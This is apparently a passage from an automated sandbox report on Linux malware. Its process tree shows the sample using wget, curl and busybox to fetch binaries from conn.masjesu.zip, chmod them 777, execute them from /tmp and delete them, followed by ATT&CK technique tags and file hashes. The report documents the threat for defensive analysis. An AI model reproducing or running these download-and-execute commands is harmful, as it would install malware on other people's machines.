/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- System Network Configuration Discovery
PID:887 -
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:889 -
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:891 -
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:892
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:893 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:894
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:897 -
/bin/chmodchmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- File and Directory Permissions Modification
PID:898 -
/tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:899
-
/bin/rmrm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:900
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:901 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Reads runtime system information
PID:902 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:903 -
/bin/chmodchmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- File and Directory Permissions Modification
PID:904 -
/tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:905
-
/bin/rmrm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:906
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:907
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:908 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:909 -
/bin/chmodchmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- File and Directory Permissions Modification
PID:910 -
/tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:911
-
/bin/rmrm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:912
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- System Network Configuration Discovery
PID:913 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:914 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- System Network Configuration Discovery
PID:915 -
/bin/chmodchmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- File and Directory Permissions Modification
PID:916 -
/tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7./MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:917
-
/bin/rmrm MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:918
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:919 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:920 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:921 -
/bin/chmodchmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- File and Directory Permissions Modification
PID:922 -
/tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:923
-
/bin/rmrm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:924
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:925 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:926 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:929 -
/bin/chmodchmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- File and Directory Permissions Modification
PID:930 -
/tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:931
-
/bin/rmrm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:932
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:933 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Checks CPU configuration
- System Network Configuration Discovery
PID:934 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:935
-
/bin/chmodchmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- File and Directory Permissions Modification
PID:936 -
/tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:937
-
/bin/rmrm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:938
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
101KB
MD5a7e686eb3f74b104a5520f08cfd54eb5
SHA158b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
SHA256617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
SHA5122767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df
-
Filesize
158KB
MD5d8e96e2fdd3c610ec19128e18de5abde
SHA110cf691ae9779bfeca8b67e75721d0a6f275e4f9
SHA256f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b
SHA512979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592
-
Filesize
210B
MD519c85b70740fc3a3f642e17edd7313a4
SHA18d12881a4937bef830e0e8fa3cb991ad58189dac
SHA2567ac6d97d0c9ae66b26a3b75b63fa16f76b5abdbd5798dc1563aeeba141cb79a7
SHA512776689ae1665d31cc792f64a4d58179f485dcda1a487ec4f43e743b52504662c7b305834d0ec6733a38cabe6e8cbc8854e0b5f1c2fd1998b2e047bffd24fe3d9